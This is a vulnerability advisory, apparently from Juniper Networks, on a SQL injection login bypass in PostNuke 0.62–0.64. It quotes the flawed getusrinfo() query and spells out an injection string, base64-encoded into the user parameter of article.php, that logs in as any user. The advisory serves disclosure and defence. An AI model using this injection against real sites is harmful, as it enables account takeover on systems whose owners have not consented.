Title: PostNuke Unauthenticated User Login Vulnerability
Severity: HIGH
Description:
PostNuke, successor to PHPNuke, is a content management system written in PHP. PostNuke versions 0.62 to 0.64 suffer from a vulnerability that allows a remote user to log-in as any user with known username and ID without authentication. The problem lies in a failure to filter inappropriate characters from variables which can be passed to the program's components by a remote attacker. This allows the attacker to alter a mysql query to the user database, bypassing password checking and assuming the identity of a specified user.
The component "article.php" calls a routine in "mainfile2.php" to update user information (i.e., log the user on) when the variable "save=1" (and the appropriate user ID and name) is specified in the URL. This routine, getusrinfo(), performs a mysql query to load user information from the database:
function getusrinfo($user) {
global $userinfo, $pntable;
$user2 = base64_decode($user);
$user3 = explode(":", $user2);
$result = mysql_query("select uid, name, uname, email, femail, url, user_avatar, user_icq, user_occ, user_from, user_intrest, user_sig,
user_viewemail, user_theme, user_aim, user_yim, user_msnm, pass, storynum, umode, uorder, thold, noscore, bio, ublockon, ublock, theme,
commentmax, timezone_offset from $pntable[users] where uname='$user3[1]' and pass='$user3[2]'");
[... snip ...]
The variable $user (and thus $user3) is taken from the base64-encoded variable "user" which is passed to "article.php" as part of the URL. If the password field of the $user variable (exploded to $user3[2]) contains a single quote character followed by modifications to the mysql query, the condition "where user=$user3[1] and pass=$user3[2]" can be bypassed, for example by appending "or user=USERNAME" to the query.
This can be accomplished by base64 encoding a string similar to "USERID:USERNAME:' or uname=USERNAME" (without the double quotes) and passing it as the "user" variable to article.php in conjunction with "save=1" (to access the vulnerable routine) and "cookieusrtime=160000" (to stay "logged in" long enough to perform actions as the user who's account has been compromised).
Affected Products:
- PostNuke Development Team PostNuke 0.62.0
- PostNuke Development Team PostNuke 0.63.0
- PostNuke Development Team PostNuke 0.64.0
References:
- PostNuke: PostNuke Product Page
- SourceForge: Project: PostNuke Content Management System
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
